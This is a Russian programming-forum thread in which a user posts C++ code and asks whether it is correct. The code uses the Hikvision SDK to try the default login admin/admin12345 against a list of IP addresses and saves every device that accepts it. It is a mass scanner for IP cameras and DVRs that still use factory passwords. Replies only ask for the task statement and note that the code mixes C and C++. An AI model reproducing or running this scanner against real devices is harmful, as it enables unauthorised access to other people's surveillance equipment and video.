Форум программистов, компьютерный форум, киберфорум
Наши страницы
С++ для начинающих
Войти
Регистрация
Восстановить пароль
 
lolipop9982
0 / 0 / 0
Регистрация: 25.05.2017
Сообщений: 2
#1

Правильно ли написан код .cpp? - C++

25.05.2017, 21:54. Просмотров 166. Ответов 5
Метки нет (Все метки)

Вот сам код
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <HCNetSDK.h>
 
#include <memory>
#include <cstdio>
#include <cstdlib>
 
typedef struct
{
    const char *name;
    char *val;
    const char *desc;
} cvar_t;
 
cvar_t ip_file = { "ip_file", "ip.txt", "Ip file ( default: ip.txt )" };
cvar_t port_num = { "port_num", "8000", "Port number ( default: 8000 )" };
cvar_t out_file = { "out_file", "out.txt", "Output file( default: out.txt )" };
cvar_t login = { "login", "admin", "Standart login( default: admin )" };
cvar_t password = { "password", "admin12345", "Standart password( default: admin12345 )" };
 
static unsigned int totalIP = 0;
static unsigned int goodIP = 0;
typedef std::unique_ptr<FILE, decltype( &fclose )> file_t;
 
void TryLogin();
void WriteData( const char *format, ... );
void PrintHelp();
 
 
int main()
{
    TryLogin();
    printf( "Total processed IP = %u\nGood IP = %u\n", totalIP, goodIP );
    printf( "2ch.hk, 2015\nYoba Inc." );
 
    return 0;
}
 
 
void TryLogin()
{
    file_t outputFile( fopen( out_file.val, "w" ), &fclose );
    outputFile.reset();
 
    if( !NET_DVR_Init() )
    {
        printf( "Error NET_DVR_Init\n.Exit." );
        return;
    }
    NET_DVR_SetConnectTime();
    NET_DVR_SetReconnect();
 
    NET_DVR_DEVICEINFO device_info;
 
    file_t ip( fopen( ip_file.val, "r" ), &fclose );
    char buffer[128];
 
    while( fgets( buffer, sizeof(buffer), ip.get() ) )
    {
        int UserID;
        UserID = NET_DVR_Login( buffer, atoi( port_num.val ), login.val, password.val, &device_info );
        totalIP++;
        if( UserID != -1 )
        {
            goodIP++;
            WriteData( "%s@%s:%s\n", buffer, login.val, password.val );
 
            NET_DVR_Logout( UserID );
        }
    }
    ip.reset();
    NET_DVR_Cleanup();
}
 
 
void WriteData( const char *format, ... )
{
    va_list list;
 
    file_t outputFile( fopen( out_file.val, "a" ), &fclose );
 
    if( !outputFile.get() )
    {
        fprintf( stderr, "WriteData: cannot open file\n" );
        return;
    }
    va_start( list, format );
    vfprintf( outputFile.get(), format, list );
    va_end( list );
 
    outputFile.reset();
}
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
25.05.2017, 21:54
Я подобрал для вас темы с готовыми решениями и ответами на вопрос Правильно ли написан код .cpp? (C++):

Правильно ли написан код
Извините, подправьте плиз, всем заранее огромное спасибо ...

правильно ли написан код в с++?
#include &lt;iostream&gt; #include &lt;map&gt; #include &lt;fstream&gt; using namespace std; ...

Найти сумму ряда (правильно ли написан код?)
#include &lt;iostream&gt; #include &lt;math.h&gt; using namespace std; int main() {...

Односвязный список (псевдокод) - поменять два элемента местами (посмотреть, правильно ли написан код)
Дан односвязный список 0...9 Дан указатель на первый элемент - p Поменять...

Код написан в Dev C. Не работает в Visual. Как нужно переделать код?
Здравствуйте. Столкнулась с такой проблемой: код был написан в Dev C, но в...

Правильно ли написан деструктор?
Вопрос, правильно ли я написал деструктор. Должно удалить переменную из памяти...

5
magirus
Почетный модератор
Эксперт по компьютерным сетямЭксперт Windows
27923 / 15660 / 960
Регистрация: 15.09.2009
Сообщений: 67,839
Записей в блоге: 78
25.05.2017, 22:10 #2
правильно, или неправильно, откуда нам знать, не видя условий задачи.
0
lolipop9982
0 / 0 / 0
Регистрация: 25.05.2017
Сообщений: 2
25.05.2017, 22:37  [ТС] #3
В других темах говорят,а вы что то не хотите...
0
nd2
2828 / 2398 / 1052
Регистрация: 29.01.2016
Сообщений: 8,022
25.05.2017, 22:43 #4
Цитата Сообщение от lolipop9982 Посмотреть сообщение
В других темах говорят
И оставался бы там. Зачем новую создал?
0
MrGluck
Модератор
Эксперт CЭксперт С++
8022 / 4865 / 1425
Регистрация: 29.11.2010
Сообщений: 13,251
25.05.2017, 23:48 #5
lolipop9982, это мешанина С и С++.
HCNetSDK.h нет, проверить не могу.
0
magirus
Почетный модератор
Эксперт по компьютерным сетямЭксперт Windows
27923 / 15660 / 960
Регистрация: 15.09.2009
Сообщений: 67,839
Записей в блоге: 78
25.05.2017, 23:50 #6
Цитата Сообщение от lolipop9982 Посмотреть сообщение
В других темах говорят
в других темах условие пишут, а вы что то не хотите.
0
25.05.2017, 23:50
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
25.05.2017, 23:50
Привет! Вот еще темы с решениями:

Правильно ли написан класс DigitalTimeException
Помогите пожалуйста, с созданием класса. Необходимон аписать класс -...

Правильно ли написан default конструктор, инициализирующий объект нулем (0/1)
Правильно ли написан default конструктор кот инициализует объект как 0 (0/1): ...

Неправильно написан код
Функция должна находить простые числа в заданном массиве. Выходит что-то вроде...

На чем написан код?
Подскажите в какой среде писался вот этот код??? Приложение #include...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
6
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2018, vBulletin Solutions, Inc.
Рейтинг@Mail.ru